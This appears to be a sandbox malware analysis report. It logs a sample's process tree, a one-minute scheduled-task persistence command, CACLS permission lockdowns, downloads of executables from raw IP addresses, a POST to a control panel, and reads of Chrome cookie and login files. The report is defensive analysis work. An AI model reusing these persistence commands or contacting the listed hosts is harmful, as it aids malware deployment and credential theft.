Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 2, 2023, 6:30 p.m. | Sept. 2, 2023, 6:50 p.m. |
Process | Command line | PID |
---|---|---|
schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F | 2888 |
cmd.exe | "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit | 2936 |
cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | 3056 |
cacls.exe | CACLS "oneetx.exe" /P "test22:N" | 2056 |
cacls.exe | CACLS "oneetx.exe" /P "test22:R" /E | 1728 |
cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | 2064 |
cacls.exe | CACLS "..\207aa4515d" /P "test22:N" | 2176 |
cacls.exe | CACLS "..\207aa4515d" /P "test22:R" /E | 2224 |
taskhost.exe | "C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe" | 2084 |
winlog.exe | "C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe" | 2788 |
msedge.exe | "C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe" | 2988 |
taskhost.exe | "C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe" | 2308 |
winlog.exe | "C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe" | 3012 |
msedge.exe | "C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe" | 2548 |
4t.exe | "C:\Users\test22\AppData\Local\Temp\1000436001\4t.exe" | 544 |
taskhost.exe | "C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe" | 1168 |
winlog.exe | "C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe" | 2628 |
msedge.exe | "C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe" | 2288 |
ss41.exe | "C:\Users\test22\AppData\Local\Temp\ss41.exe" | 2672 |
explorer.exe | C:\Windows\Explorer.EXE | 1452 |
Name | Response | Post-Analysis Lookup |
---|---|---|
z.nnnaajjjgc.com | 156.236.72.121 | |
happy1sept.tuktuk.ug | 85.209.3.9 | |
Suricata Alerts
Suricata TLS
No Suricata TLS
Type | Value |
---|---|
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |

Suspicious features | Suspicious request |
---|---|
POST method with no referer header, POST method with no useragent header, Connection to IP address | POST http://5.42.65.80/8bmeVwqx/index.php |
GET method with no useragent header, Connection to IP address | GET http://5.42.65.80/softtool.exe |
GET method with no useragent header, Connection to IP address | GET http://95.214.27.254/getfile/taskhost.exe |
GET method with no useragent header, Connection to IP address | GET http://95.214.27.254/getfile/winlog.exe |
GET method with no useragent header, Connection to IP address | GET http://95.214.27.254/getfile/msedge.exe |
GET method with no useragent header, Connection to IP address | GET http://5.42.65.80/alldata.exe |
GET method with no useragent header, Connection to IP address | GET http://5.42.65.80/4t.exe |

Type | Value |
---|---|
request | POST http://5.42.65.80/8bmeVwqx/index.php |
request | GET http://5.42.65.80/softtool.exe |
request | GET http://95.214.27.254/getfile/taskhost.exe |
request | GET http://95.214.27.254/getfile/winlog.exe |
request | GET http://95.214.27.254/getfile/msedge.exe |
request | GET http://5.42.65.80/alldata.exe |
request | GET http://5.42.65.80/4t.exe |
request | POST http://5.42.65.80/8bmeVwqx/index.php |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\1000434001\softtool.exe |
file | C:\Users\test22\AppData\Local\Temp\1000435001\alldata.exe |
file | C:\Users\test22\AppData\Local\Temp\1000436001\4t.exe |
file | C:\Users\test22\AppData\Local\Temp\ss41.exe |
file | C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe |
file | C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe |
file | C:\Users\test22\AppData\Local\Temp\oldplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit |
file | C:\Users\test22\AppData\Local\Temp\oldplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\ss41.exe |
file | C:\Users\test22\AppData\Local\Temp\1000434001\softtool.exe |
file | C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe |
file | C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe |
file | C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe |
file | C:\Users\test22\AppData\Local\Temp\1000435001\alldata.exe |
file | C:\Users\test22\AppData\Local\Temp\1000436001\4t.exe |
file | C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe |
file | C:\Users\test22\AppData\Local\Temp\oldplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\1000435001\alldata.exe |
file | C:\Users\test22\AppData\Local\Temp\1000434001\softtool.exe |